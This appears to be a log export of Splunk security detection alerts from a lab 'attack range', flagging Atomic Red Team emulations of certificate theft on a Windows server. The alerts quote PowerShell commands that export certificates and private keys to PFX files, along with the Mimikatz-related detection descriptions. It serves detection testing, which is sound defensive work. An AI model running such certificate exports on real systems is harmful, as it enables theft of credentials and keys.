1682697600, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1682697600", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="Windows Certificate Services", annotations._all="CIS 10", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-28 16:13:23.489", file_name="atomic.pfx", file_path="C:\\Temp\\atomic.pfx", firstTime="2023-04-28T16:13:23", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702783.035365000", lastTime="2023-04-28T16:13:23", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."
1682702677, search_name="ESCU - Windows PowerShell Export PfxCertificate - Rule", EventCode="4104", ScriptBlockText="{$mypwd = ConvertTo-SecureString -String \"AtomicRedTeam\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="T1552", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702674.628962000", lastTime="2023-04-28T16:13:47", risk_message="A PowerShell Cmdlet related to exporting a PFX Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following analytic identifies the PowerShell Cmdlet export-pfxcertificate utilizing Script Block Logging. 
This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1682702677, search_name="ESCU - Windows PowerShell Export PfxCertificate - Rule", EventCode="4104", ScriptBlockText="& {$mypwd = ConvertTo-SecureString -String \"AtomicRedTeam\" -Force -AsPlainText $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Get-ChildItem -Path $cert.Thumbprint | Export-PfxCertificate -FilePath $env:Temp\\atomicredteam.pfx -Password $mypwd}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="DE.AE", annotations._all="T1552", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:47", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682702674.628962000", lastTime="2023-04-28T16:13:47", risk_message="A PowerShell Cmdlet related to exporting a PFX Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The following 
analytic identifies the PowerShell Cmdlet export-pfxcertificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1682701405, search_name="ESCU - Windows PowerShell Export Certificate - Rule", EventCode="4104", ScriptBlockText="{$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._all="DE.AE", annotations._all="T1552", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682701403.244879000", lastTime="2023-04-28T16:13:58", risk_message="A PowerShell Cmdlet related to exporting a Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", savedsearch_description="The 
following analytic identifies the PowerShell Cmdlet export-certificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1682701405, search_name="ESCU - Windows PowerShell Export Certificate - Rule", EventCode="4104", ScriptBlockText="& {$cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\\LocalMachine\\My Set-Location Cert:\\LocalMachine\\My Export-Certificate -Type CERT -Cert Cert:\\LocalMachine\\My\\$($cert.Thumbprint) -FilePath $env:Temp\\AtomicRedTeam.cer}", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 60, \"impact\": 60, \"mitre_attack\": [\"T1552.004\", \"T1552\", \"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="T1552.004", annotations._all="T1649", annotations._all="Windows Certificate Services", annotations._all="DE.AE", annotations._all="T1552", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1552.004", annotations.mitre_attack="T1552", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", firstTime="2023-04-28T16:13:58", info_max_time="1682700600.000000000", info_min_time="1682697000.000000000", info_search_time="1682701403.244879000", lastTime="2023-04-28T16:13:58", risk_message="A PowerShell Cmdlet related to exporting a Certificate was ran on mswin-server.attackrange.local, attempting to export a certificate.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="36.0", 
savedsearch_description="The following analytic identifies the PowerShell Cmdlet export-certificate utilizing Script Block Logging. This particular behavior is related to an adversary attempting to steal certificates local to the Windows endpoint within the Certificate Store.", user_id="'S-1-5-21-3439621488-2671704973-1532913862-500'" 1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:56.065", file_name="self-signed-cert.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\carbanak\\Resources\\step7\\self-signed-cert.pfx", firstTime="2023-04-20T02:56:56", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:56", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. 
Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:55.635", file_name="shockwave.local.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\apt29\\Resources\\Scenario_1\\shockwave.local.pfx", firstTime="2023-04-20T02:56:55", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:55", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 
1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:55.162", file_name="shockwave.local.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\apt29\\Archive\\Emulation_Plan\\Day 1\\payloads\\shockwave.local.pfx", firstTime="2023-04-20T02:56:55", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:55", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported." 
1681956000, search_name="ESCU - Windows Mimikatz Crypto Export File Extensions - Rule", orig_time="1681956000", analyticstories="Windows Certificate Services", annotations="{\"analytic_story\": [\"Windows Certificate Services\"], \"cis20\": [\"CIS 10\"], \"confidence\": 70, \"impact\": 40, \"mitre_attack\": [\"T1649\"], \"nist\": [\"DE.AE\"]}", annotations._all="CIS 10", annotations._all="Windows Certificate Services", annotations._all="T1649", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Windows Certificate Services", annotations.cis20="CIS 10", annotations.mitre_attack="T1649", annotations.nist="DE.AE", count="1", dest="mswin-server.attackrange.local", file_create_time="2023-04-20 02:56:54.671", file_name="dmevals.local.pfx", file_path="C:\\Users\\Administrator\\Documents\\adversary_emulation_library\\apt29\\Archive\\CALDERA_DIY\\evals\\payloads\\dmevals.local.pfx", firstTime="2023-04-20T02:56:54", info_max_time="1681962600.000000000", info_min_time="1681959000.000000000", info_search_time="1681964782.803141000", lastTime="2023-04-20T02:56:54", risk_message="Certificate file extensions realted to Mimikatz were identified on disk on mswin-server.attackrange.local.", risk_object="mswin-server.attackrange.local", risk_object_type="system", risk_score="28.0", savedsearch_description="The following analytic identifies hardcoded extensions related to the Crypo module within Mimikatz. Moving certificates or downloading them is not malicious, however with Mimikatz having hardcoded names it helps to identify potential usage of certificates being exported."